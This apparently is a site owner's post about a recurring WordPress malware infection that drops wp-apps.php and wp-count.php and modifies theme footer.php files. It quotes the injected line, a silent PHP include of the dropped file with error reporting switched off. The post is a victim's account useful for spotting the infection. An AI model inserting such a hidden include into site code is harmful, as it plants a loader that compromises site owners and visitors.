Another Malware attack on WordPress sites (wp-apps.php & wp-count.php)
One of my hosting account has been affected by this Malware. So far, haven’t been able to figure out how it got there.
Two files are created in WordPress directories: wp-apps.php and wp-count.php
And in the theme, mostly footer.php is modified. This code gets added to the file.
< ?php error_reporting(0);include_once $_SERVER['DOCUMENT_ROOT'].'/wp-apps.php';? >
Using latest version of WordPress now. I removed the files before couple of times, but the files come back again like after a week.
Some of my websites have WordPress installed in directories, as in domain.com/sometopic/
These folders don’t get affected. Only the ones with TLDs in the name get affected. Also the site in public_html doesn’t get affected. I could try changing all the passwords, too many sites, too many passwords, bummer…besides I wouldn’t find out how did the files get there.